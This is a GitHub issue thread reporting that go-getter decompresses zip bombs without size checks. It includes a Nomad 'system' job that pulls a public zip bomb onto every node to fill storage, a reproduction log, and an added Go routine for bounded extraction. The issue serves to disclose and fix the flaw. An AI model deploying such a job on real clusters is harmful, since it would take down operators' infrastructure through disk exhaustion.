Vulnerable to Zip bombs. #407

Closed
jboero opened this issue Jan 19, 2023 · 1 comment · Fixed by #412

jboero commented Jan 19, 2023

Zip bombs or compression bombs are trick archives that are custom structured to generate terabytes of garbage (or zeros) from a small archive. It turns out go-getter's decompression options and detectors are susceptible to this. This is behaviour by design, but it might be a good idea if go-getter verified that an archive's size will fit in storage before decompression. This doesn't just apply to zip files but also xz, zstd, etc. Downloading a zip bomb today is actually detected and blocked by Chrome and some browsers to prevent you from accidentally filling your partition.

A crafty Nomad job of type "system" could instantly bring down an entire Nomad DC if the artifact is downloaded to all nodes and expanded to fill all storage. This pseudojob is missing the exec driver.

job "bomb" {
  type = "system"
  datacenters = ["dc1"]
  group "artifacts" {
    task "server" {
      artifact {
        source      = "https://www.bamsoftware.com/hacks/zipbomb/zblg.zip"
        destination = "/tmp/some-directory"
        options {
          checksum = "md5:207b597f03033b2e0644bbbc29f04053"
        }
      }
    }
  }
}

Beware zip bombs and please use caution if trying to reproduce this:
https://www.bamsoftware.com/hacks/zipbomb/

$ ~/go/bin/go-getter https://www.bamsoftware.com/hacks/zipbomb/zblg.zip /tmp/
2023/01/19 13:11:00 Error downloading: write /tmp/1: no space left on device
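As an added example (not go-getter's code and not part of the original issue), a bounded extraction routine in Go that rejects an entry when its declared size exceeds the remaining budget and, because the header value is attacker controlled, also counts the bytes actually produced while decompressing. The names extractBounded, makeZip and ErrBombSuspected are hypothetical; the archive is constructed in memory.

```go
package main

import (
	"archive/zip"
	"bytes"
	"errors"
	"fmt"
	"io"
)

// ErrBombSuspected is returned when decompressed output would exceed the byte budget.
var ErrBombSuspected = errors.New("decompressed size exceeds limit; possible zip bomb")

// extractBounded walks every entry of a zip archive and enforces maxTotal bytes
// of decompressed output across all entries. The declared UncompressedSize64 is
// checked first as a cheap rejection; the actual byte count is enforced during the
// copy because a crafted header may understate the real size.
func extractBounded(archive []byte, maxTotal uint64) (uint64, error) {
	r, err := zip.NewReader(bytes.NewReader(archive), int64(len(archive)))
	if err != nil {
		return 0, err
	}
	var written uint64
	for _, f := range r.File {
		remaining := maxTotal - written
		if f.UncompressedSize64 > remaining {
			return written, fmt.Errorf("%s: %w", f.Name, ErrBombSuspected)
		}
		rc, err := f.Open()
		if err != nil {
			return written, err
		}
		// Read at most one byte past the budget so an overrun is observable
		// without ever decompressing the whole stream. Output goes to io.Discard
		// here; a real extractor would write to the destination file instead.
		n, err := io.Copy(io.Discard, io.LimitReader(rc, int64(remaining)+1))
		rc.Close()
		if err != nil {
			return written, err
		}
		if uint64(n) > remaining {
			return written, fmt.Errorf("%s: %w", f.Name, ErrBombSuspected)
		}
		written += uint64(n)
	}
	return written, nil
}

// makeZip builds a constructed archive with one highly compressible entry of size zero bytes.
func makeZip(name string, size int) []byte {
	var buf bytes.Buffer
	w := zip.NewWriter(&buf)
	fw, _ := w.Create(name)
	io.Copy(fw, bytes.NewReader(make([]byte, size)))
	w.Close()
	return buf.Bytes()
}
```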

picatz commented Jan 20, 2023

👋 Hello @jboero! In the future, please follow our documented security policy to report vulnerabilities.
